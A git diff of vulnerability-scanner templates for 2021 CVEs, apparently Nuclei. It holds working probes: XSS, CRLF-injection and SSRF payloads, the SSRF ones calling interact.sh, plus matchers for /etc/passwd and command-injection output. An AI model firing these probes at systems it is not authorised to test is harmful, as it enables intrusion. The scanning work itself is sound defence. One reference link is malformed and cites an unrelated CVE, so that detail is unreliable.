-  description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
+  description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.
   reference:
     - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
     - http://sercomm.com
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-27132
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -18,7 +19,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
+      - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
 
     matchers-condition: and
     matchers:
@@ -31,7 +32,9 @@ requests:
         words:
           - "Content-Disposition: attachment;filename=test.txt"
           - "Set-Cookie:CRLFInjection=Test"
-          - "Location: example.com"
+          - "Location: interact.sh"
           - "X-XSS-Protection:0"
         part: header
         condition: and
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-27309.yaml b/cves/2021/CVE-2021-27309.yaml
new file mode 100644
index 0000000000..ddfc1caa7d
--- /dev/null
+++ b/cves/2021/CVE-2021-27309.yaml
@@ -0,0 +1,44 @@
+id: CVE-2021-27309
+
+info:
+  name: Clansphere CMS 2011.4 - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: |
+    Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the  "module" parameter.
+  reference:
+    - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-27309
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-27309
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+  tags: cve,cve2021,clansphere,xss,cms,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '"></script><script>alert(document.domain)</script>.php'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-27310.yaml b/cves/2021/CVE-2021-27310.yaml
index dc3d8e65cd..c393e5c50f 100644
--- a/cves/2021/CVE-2021-27310.yaml
+++ b/cves/2021/CVE-2021-27310.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-27310
 
 info:
-  name: Clansphere CMS 2011.4 - Reflected Cross-Site Scripting (XSS)
+  name: Clansphere CMS 2011.4 - Cross-Site Scripting
   author: alph4byt3
   severity: medium
-  description: Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "language" parameter.
+  description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter.
   reference:
     - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-27310
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml
index 2113ab1c6e..6c3e5a6c0f 100644
--- a/cves/2021/CVE-2021-27330.yaml
+++ b/cves/2021/CVE-2021-27330.yaml
@@ -1,37 +1,47 @@
 id: CVE-2021-27330
 
 info:
-  name: Triconsole 3.75 XSS
-  author: pikpikcu
+  name: Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting
+  author: pikpikcu,daffainfo
   severity: medium
-  description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further
-    attacks such as reading browser history, directory listings, and file contents.
+  description: |
+    Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
   reference:
     - https://www.exploit-db.com/exploits/49597
+    - http://www.triconsole.com/
+    - http://www.triconsole.com/php/calendar_datepicker.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-27330
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-27330
     cwe-id: CWE-79
-  tags: cve,cve2021,triconsole,xss
+  metadata:
+    google-query: intitle:TriConsole.com - PHP Calendar Date Picker
+    verified: "true"
+  tags: xss,edb,cve,cve2021,triconsole
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/calendar_form.php/"><script>alert(document.domain)</script>'
+      - '{{BaseURL}}/calendar/calendar_form.php/"><script>alert(document.domain)</script>'
+
     matchers-condition: and
     matchers:
-
       - type: word
-        words:
-          - "<script>alert(document.domain)</script>"
         part: body
+        words:
+          - '<script>alert(document.domain)</script>'
+          - '<title>TriConsole.com - PHP Calendar Date Picker</title>'
+        condition: and
 
       - type: word
+        part: header
         words:
           - "text/html"
-        part: header
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-27358.yaml b/cves/2021/CVE-2021-27358.yaml
index 3eed4dd72d..e9e3375f5f 100644
--- a/cves/2021/CVE-2021-27358.yaml
+++ b/cves/2021/CVE-2021-27358.yaml
@@ -14,6 +14,8 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2021-27358
     cwe-id: CWE-306
+  metadata:
+    shodan-query: title:"Grafana"
   tags: cve,cve2021,grafana,unauth
 
 requests:
diff --git a/cves/2021/CVE-2021-27519.yaml b/cves/2021/CVE-2021-27519.yaml
new file mode 100644
index 0000000000..93e44aea56
--- /dev/null
+++ b/cves/2021/CVE-2021-27519.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-27519
+
+info:
+  name: FUDForum 3.1.0 - Cross-Site Scripting
+  author: kh4sh3i
+  severity: medium
+  description: |
+    FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/49942
+    - https://github.com/fudforum/FUDforum/issues/2
+    - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-27519
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-27519
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: 'http.html:"Powered by: FUDforum"'
+    verified: "true"
+  tags: xss,fudforum,edb,packetstorm,cve,cve2021
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'highlightSearchTerms("x" onmouseover=alert(1) x="");'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-27561.yaml b/cves/2021/CVE-2021-27561.yaml
index 17e966bc66..80ea67d3c3 100644
--- a/cves/2021/CVE-2021-27561.yaml
+++ b/cves/2021/CVE-2021-27561.yaml
@@ -1,18 +1,20 @@
 id: CVE-2021-27561
 
 info:
-  name: YeaLink DM PreAuth RCE
+  name: YeaLink DM 3.6.0.20 - Remote Command Injection
   author: shifacyclewala,hackergautam
   severity: critical
-  description: A malicious actor can trigger Unauthenticated Remote Code Execution
+  description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
+    - https://ssd-disclosure.com/?p=4688
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-27561
     cwe-id: CWE-77
-  tags: cve,cve2021,rce,yealink,mirai
+  tags: cve,cve2021,rce,yealink,mirai,kev
 
 requests:
   - method: GET
@@ -42,3 +44,5 @@ requests:
       - type: regex
         regex:
           - "(u|g)id=.*"
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml
index 6ff30600ce..676286b7a8 100644
--- a/cves/2021/CVE-2021-27651.yaml
+++ b/cves/2021/CVE-2021-27651.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-27651
 
 info:
-  name: Pega Infinity Authentication bypass
-  author: idealphase
+  name: Pega Infinity - Authentication Bypass
+  author: idealphase,daffainfo
   severity: critical
-  description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
+  description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.
   reference:
     - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
     - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
+    - https://collaborate.pega.com/discussion/pega-security-advisory-a21-hotfix-matrix
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -23,6 +24,19 @@ requests:
     cookie-reuse: true
     redirects: true
     max-redirects: 2
+    extractors:
+      - type: regex
+        name: version
+        internal: true
+        group: 1
+        regex:
+          - '(?m)<span>Pega ([0-9.]+)</span>'
+
+      - type: regex
+        group: 1
+        regex:
+          - '(?m)<span>Pega ([0-9.]+)</span>'
+
     matchers-condition: and
     matchers:
       - type: status
@@ -30,17 +44,12 @@ requests:
           - 200
 
       - type: word
+        part: body
         words:
-          - "Pega Infinity"
-        part: body
+          - 'Pega Infinity'
 
-      - type: regex
-        regex:
-          - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
-        part: body
+      - type: dsl
+        dsl:
+          - compare_versions(version, '< 8.5.2', '>= 8.2.1')
 
-    extractors:
-      - type: regex
-        regex:
-          - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
-        part: body
\ No newline at end of file
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-27748.yaml b/cves/2021/CVE-2021-27748.yaml
new file mode 100644
index 0000000000..4d908e4c87
--- /dev/null
+++ b/cves/2021/CVE-2021-27748.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-27748
+
+info:
+  name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
+  author: pdteam
+  severity: high
+  description: |
+    IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
+  reference:
+    - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+    - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
+    - hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268
+  classification:
+    cve-id: CVE-2021-27748
+  metadata:
+    verified: true
+    shodan-query: http.html:"IBM WebSphere Portal"
+  tags: cve,cve2021,hcl,ibm,ssrf,websphere
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
+      - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Interactsh Server"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml
index 29d63ef95b..913394f5e4 100644
--- a/cves/2021/CVE-2021-27850.yaml
+++ b/cves/2021/CVE-2021-27850.yaml
@@ -1,13 +1,16 @@
 id: CVE-2021-27850
 
 info:
-  name: Apache Tapestry - Arbitrary class download
+  name: Apache Tapestry - Remote Code Execution
   author: pdteam
   severity: critical
   description: |
-    A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
+    Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
+    - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E
+    - http://www.openwall.com/lists/oss-security/2021/04/15/1
+    - https://security.netapp.com/advisory/ntap-20210528-0002/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -53,3 +56,5 @@ requests:
           - 'webtools'
         part: body
         condition: and
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml
index 987085da21..f854a1c72a 100644
--- a/cves/2021/CVE-2021-27905.yaml
+++ b/cves/2021/CVE-2021-27905.yaml
@@ -1,17 +1,16 @@
 id: CVE-2021-27905
 
 info:
-  name: Apache Solr <= 8.8.1 SSRF
+  name: Apache Solr <=8.8.1 - Server-Side Request Forgery
   author: hackergautam
   severity: critical
-  description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler
-    on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior
-    to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
+  description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
   reference:
     - https://www.anquanke.com/post/id/238201
     - https://ubuntu.com/security/CVE-2021-27905
     - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
     - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
+  remediation: This issue is resolved in Apache Solr 8.8.2 and later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -28,7 +27,7 @@ requests:
         Connection: close
 
       - |
-        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
+        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
         Host: {{Hostname}}
         Accept-Language: en
         Connection: close
@@ -45,4 +44,6 @@ requests:
       - type: word
         words:
           - '<str name="status">OK</str>'
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-27931.yaml b/cves/2021/CVE-2021-27931.yaml
index 2c8b3c0896..a426c5d084 100644
--- a/cves/2021/CVE-2021-27931.yaml
+++ b/cves/2021/CVE-2021-27931.yaml
@@ -1,11 +1,10 @@
 id: CVE-2021-27931
 
 info:
-  name: LumisXP Blind XXE
+  name: LumisXP <10.0.0 - Blind XML External Entity Attack
   author: alph4byt3
   severity: critical
-  description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XXE via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes
-    such as reading local server files or denial of service.
+  description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.
   reference:
     - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt
     - https://nvd.nist.gov/vuln/detail/CVE-2021-27931
@@ -36,3 +35,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml
index 76be8b8620..7cd62c1bd9 100644
--- a/cves/2021/CVE-2021-28149.yaml
+++ b/cves/2021/CVE-2021-28149.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-28149
 
 info:
-  name: Hongdian Directory Traversal
+  name: Hongdian H8922 3.0.5 Devices - Local File Inclusion
   author: gy741
   severity: medium
   description: |
-    Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
+    Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+    - http://en.hongdian.com/Products/Details/H8922
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28149
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
@@ -46,3 +47,5 @@ requests:
           - "sshd:[x*]"
           - "root:[$]"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml
index ea5cac2d78..8c9d76f47e 100644
--- a/cves/2021/CVE-2021-28150.yaml
+++ b/cves/2021/CVE-2021-28150.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28150
+    - http://en.hongdian.com/Products/Details/H8922
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 5.5
diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml
index 950ca07b98..7a40803175 100644
--- a/cves/2021/CVE-2021-28151.yaml
+++ b/cves/2021/CVE-2021-28151.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-28151
 
 info:
-  name: Hongdian Command Injection
+  name: Hongdian H8922 3.0.5 - Remote Command Injection
   author: gy741
   severity: high
   description: |
     Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+    - http://en.hongdian.com/Products/Details/H8922
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28151
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
@@ -54,3 +55,5 @@ requests:
           - "groups="
         part: body
         condition: and
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml
index 15002fbb84..609e6d04ce 100644
--- a/cves/2021/CVE-2021-28164.yaml
+++ b/cves/2021/CVE-2021-28164.yaml
@@ -9,12 +9,13 @@ info:
   reference:
     - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
     - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
+    - https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2021-28164
     cwe-id: CWE-200
-  tags: cve,cve2021,jetty
+  tags: vulhub,cve,cve2021,jetty
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml
index f3b48d4dd8..e5cb2e4d5f 100644
--- a/cves/2021/CVE-2021-28169.yaml
+++ b/cves/2021/CVE-2021-28169.yaml
@@ -9,6 +9,8 @@ info:
   reference:
     - https://twitter.com/sec715/status/1406787963569065988
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28169
+    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
+    - https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
diff --git a/cves/2021/CVE-2021-28377.yaml b/cves/2021/CVE-2021-28377.yaml
index 29f05dc457..03cc1bbced 100644
--- a/cves/2021/CVE-2021-28377.yaml
+++ b/cves/2021/CVE-2021-28377.yaml
@@ -1,19 +1,18 @@
 id: CVE-2021-28377
 
 info:
-  name: ChronoForums 2.0.11 - Directory Traversal
+  name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
   author: 0x_Akoko
-  severity: high
-  description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, like for instance Joomla's configuration
-    file containing secret credentials.
+  severity: medium
+  description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
   reference:
     - https://herolab.usd.de/en/security-advisories/usd-2021-0007/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28377
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
-    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
     cve-id: CVE-2021-28377
-    cwe-id: CWE-200
+    cwe-id: CWE-22
   tags: cve,cve2021,chronoforums,lfi,joomla
 
 requests:
@@ -30,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml
index 2e27fe8b13..556bc8721f 100644
--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -1,15 +1,15 @@
 id: CVE-2021-28918
 
 info:
-  name: Netmask NPM Package SSRF
+  name: Netmask NPM Package - Server-Side Request Forgery
   author: johnjhacking
   severity: critical
-  description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote
-    unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
+  description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
   reference:
     - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
     - https://github.com/advisories/GHSA-pch5-whg9-qr2r
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
+    - https://github.com/rs/node-netmask
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
@@ -37,3 +37,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-28937.yaml b/cves/2021/CVE-2021-28937.yaml
index 3e5da405d2..bdf8fa2c1a 100644
--- a/cves/2021/CVE-2021-28937.yaml
+++ b/cves/2021/CVE-2021-28937.yaml
@@ -1,12 +1,14 @@
 id: CVE-2021-28937
 
 info:
-  name: Acexy Wireless-N WiFi Repeater Password Disclosure
+  name: Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure
   author: geeknik
   severity: high
-  description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext.
+  description: Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.
   reference:
     - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990
+    - http://acexy.com
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-28937
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -30,3 +32,5 @@ requests:
           - "addCfg('username'"
           - "addCfg('newpass'"
         condition: and
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml
index 724f4dd222..34068f721b 100644
--- a/cves/2021/CVE-2021-29156.yaml
+++ b/cves/2021/CVE-2021-29156.yaml
@@ -4,17 +4,19 @@ info:
   name: LDAP Injection In OpenAM
   author: melbadry9,xelkomy
   severity: high
-  description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an
-    LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
+  description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
   reference:
-    - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
-      https://portswigger.net/research/hidden-oauth-attack-vectors
+    - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ https://portswigger.net/research/hidden-oauth-attack-vectors
+    - https://portswigger.net/research/hidden-oauth-attack-vectors
+    - https://bugster.forgerock.org/jira/browse/OPENAM-10135
+  remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-29156
     cwe-id: CWE-74
-  remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
+  metadata:
+    shodan-query: http.title:"OpenAM"
   tags: cve,cve2021,openam,ldap,injection
 
 requests:
diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml
index 1751cd1dde..0189e4eafb 100644
--- a/cves/2021/CVE-2021-29203.yaml
+++ b/cves/2021/CVE-2021-29203.yaml
@@ -1,21 +1,20 @@
 id: CVE-2021-29203
 
 info:
-  name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
+  name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
   author: madrobot
   severity: critical
-  description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could
-    be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software
-    update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
+  description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
   reference:
     - https://www.tenable.com/security/research/tra-2021-15
